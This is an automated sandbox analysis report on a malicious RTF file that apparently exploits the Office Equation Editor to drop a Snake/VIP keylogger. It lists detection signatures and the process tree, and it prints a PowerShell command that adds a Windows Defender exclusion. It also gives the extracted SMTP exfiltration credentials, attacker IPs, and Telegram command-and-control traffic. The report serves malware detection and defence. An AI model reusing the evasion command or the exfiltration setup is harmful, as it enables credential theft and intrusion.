Windows Analysis Report
Xkl0PnD8zFPjfh1.wiz.rtf

Overview

General Information

Sample name: Xkl0PnD8zFPjfh1.wiz.rtf
Analysis ID: 1558704
MD5: f6e89e6c3ab17d8d58699ccefeaf3c8d
SHA1: 86c245d0a2ef138aa7afca6bb43316e251b07c68
SHA256: 32f5bf26d32b42212ada3e88017ad037c6c84f760a64585252576d893a00ff5f
Tags: RTF, user-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3520 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3600 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wealthcharliebgk.exe (PID: 3756 cmdline: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe" MD5: 9D980CAD65D26D5E36BD306044B26AC9)
        • powershell.exe (PID: 3844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • wealthcharliebgk.exe (PID: 3860 cmdline: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe" MD5: 9D980CAD65D26D5E36BD306044B26AC9)
    • EQNEDT32.EXE (PID: 4084 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "logs5@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "logs5@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
Xkl0PnD8zFPjfh1.wiz.rtf | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen
  • 0x12a47:$obj2: \objdata
  • 0x12a5d:$obj3: \objupdate
  • 0x12a1f:$obj5: \objautlink
Source | Rule | Description | Author | Strings
00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2daa0:$a1: get_encryptedPassword
  • 0x2e028:$a2: get_encryptedUsername
  • 0x2d713:$a3: get_timePasswordChanged
  • 0x2d82a:$a4: get_passwordField
  • 0x2dab6:$a5: set_encryptedPassword
  • 0x307d2:$a6: get_passwords
  • 0x30b66:$a7: get_logins
  • 0x307be:$a8: GetOutlookPasswords
  • 0x30177:$a9: StartKeylogger
  • 0x30abf:$a10: KeyLoggerEventArgs
  • 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.876070304.00000000023F1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security

Source | Rule | Description | Author | Strings
5.2.wealthcharliebgk.exe.3670430.5.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
5.2.wealthcharliebgk.exe.3670430.5.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
5.2.wealthcharliebgk.exe.3670430.5.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
5.2.wealthcharliebgk.exe.3670430.5.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2bea0:$a1: get_encryptedPassword
  • 0x2c428:$a2: get_encryptedUsername
  • 0x2bb13:$a3: get_timePasswordChanged
  • 0x2bc2a:$a4: get_passwordField
  • 0x2beb6:$a5: set_encryptedPassword
  • 0x2ebd2:$a6: get_passwords
  • 0x2ef66:$a7: get_logins
  • 0x2ebbe:$a8: GetOutlookPasswords
  • 0x2e577:$a9: StartKeylogger
  • 0x2eebf:$a10: KeyLoggerEventArgs
  • 0x2e617:$a11: KeyLoggerEventArgsEventHandler
5.2.wealthcharliebgk.exe.3670430.5.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x394b6:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x38b59:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x38db6:$a4: \Orbitum\User Data\Default\Login Data
  • 0x39795:$a5: \Kometa\User Data\Default\Login Data

Exploits

Source: Network Connection, Author: Joe Security: Data: DestinationIp: 87.120.84.39, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3600, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
Source: File created, Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3600, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe

System Summary

Source: Network Connection, Author: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3600, Protocol: tcp, SourceIp: 87.120.84.39, SourceIsIpv6: false, SourcePort: 80
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ParentImage: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, ParentProcessId: 3756, ParentProcessName: wealthcharliebgk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ProcessId: 3844, ProcessName: powershell.exe
Source: Process started, Author: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, NewProcessName: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3600, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ProcessId: 3756, ProcessName: wealthcharliebgk.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, NewProcessName: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3600, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ProcessId: 3756, ProcessName: wealthcharliebgk.exe
Source: DNS query, Author: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, QueryName: checkip.dyndns.org
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3600, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ParentImage: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, ParentProcessId: 3756, ParentProcessName: wealthcharliebgk.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wealthcharliebgk.exe", ProcessId: 3844, ProcessName: powershell.exe
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3520, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Source: File created, Author: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3844, TargetFilename: C:\Users\user\AppData\Local\Temp\obnb3a4t.cfs.ps1
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-19T18:08:04.164643+0100 | 2022050 | 1 | A Network Trojan was detected | 87.120.84.39 | 80 | 192.168.2.22 | 49161 | TCP
2024-11-19T18:08:04.342515+0100 | 2022051 | 1 | A Network Trojan was detected | 87.120.84.39 | 80 | 192.168.2.22 | 49161 | TCP
2024-11-19T18:08:12.766539+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.22 | 49164 | 188.114.97.3 | 443 | TCP
2024-11-19T18:08:11.081951+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49162 | 193.122.130.0 | 80 | TCP
2024-11-19T18:08:12.338005+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49162 | 193.122.130.0 | 80 | TCP
2024-11-19T18:08:14.160503+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.22 | 49165 | 193.122.130.0 | 80 | TCP

AV Detection

Source: Xkl0PnD8zFPjfh1.wiz.rtf, Avira: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe, Avira: detection malicious, Label: HEUR/AGEN.1306879
Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Avira: detection malicious, Label: HEUR/AGEN.1306879
Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "logs5@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587", "Version": "4.4"}
Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "logs5@covid19support.top", "Password": "7213575aceACE@@", "Host": "mail.covid19support.top", "Port": "587"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe, ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, ReversingLabs: Detection: 31%
Source: Xkl0PnD8zFPjfh1.wiz.rtf, ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xkl0PnD8zFPjfh1[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe, Joe Sandbox ML: detected

Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Network connect: IP: 87.120.84.39 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown, HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49179 version: TLS 1.2

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2D881h8_2_00A2D5D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2C2C9h8_2_00A2C020
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A23BC9h8_2_00A23920
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2CFD1h8_2_00A2CD28
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A248D1h8_2_00A24628
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A255D9h8_2_00A25330
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2DCD9h8_2_00A2DA30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A262E1h8_2_00A26038
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A292A9h8_2_00A29000
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2F0E1h8_2_00A2EE10
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2B5C1h8_2_00A2B318
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2AD11h8_2_00A2AA68
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2BA19h8_2_00A2B770
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A23319h8_2_00A23070
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A24021h8_2_00A23D78
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2C721h8_2_00A2C478
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2EC49h8_2_00A2E978
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A2FA11h8_2_00A2F740
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A26FE9h8_2_00A26D40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A27CF1h8_2_00A27A48
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A289F9h8_2_00A28750
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then jmp 00A29701h8_2_00A29458
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00A529CE
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00A55F28
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00A55F38
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00A52B00
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]8_2_00A52A50
                Source: global traffic DNS query: name: checkip.dyndns.org
                Source: global traffic DNS query: name: reallyfreegeoip.org
                Source: global traffic DNS query: name: api.telegram.org
                Source: global traffic TCP traffic: 192.168.2.22:49163 -> 188.114.97.3:443
                Source: global traffic TCP traffic: 192.168.2.22:49164 -> 188.114.97.3:443
                Source: global traffic TCP traffic: 192.168.2.22:49166 -> 188.114.97.3:443
                Source: global traffic TCP traffic: 192.168.2.22:49168 -> 188.114.97.3:443
                Source: global traffic TCP traffic: 192.168.2.22:49170 -> 188.114.96.3:443
                Source: global traffic TCP traffic: 192.168.2.22:49172 -> 188.114.96.3:443
                Source: global traffic TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
                Source: global traffic TCP traffic: 192.168.2.22:49176 -> 188.114.96.3:443
                Source: global traffic TCP traffic: 192.168.2.22:49178 -> 188.114.96.3:443
                Source: global traffic TCP traffic: 192.168.2.22:49179 -> 149.154.167.220:443
                Source: global traffic TCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global traffic TCP traffic: 192.168.2.22:49162 -> 193.122.130.0:80
                Source: global traffic TCP traffic: 192.168.2.22:49165 -> 193.122.130.0:80
                Source: global traffic TCP traffic: 192.168.2.22:49167 -> 158.101.44.242:80
                Source: global traffic TCP traffic: 192.168.2.22:49169 -> 132.226.8.169:80
                Source: global traffic TCP traffic: 192.168.2.22:49171 -> 132.226.247.73:80
                Source: global traffic TCP traffic: 192.168.2.22:49173 -> 193.122.130.0:80
                Source: global traffic TCP traffic: 192.168.2.22:49175 -> 193.122.130.0:80
                Source: global traffic TCP traffic: 192.168.2.22:49177 -> 193.122.130.0:80
                Source: global traffic TCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 192.168.2.22:49161 -> 87.120.84.39:80
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
                Source: global trafficTCP traffic: 87.120.84.39:80 -> 192.168.2.22:49161
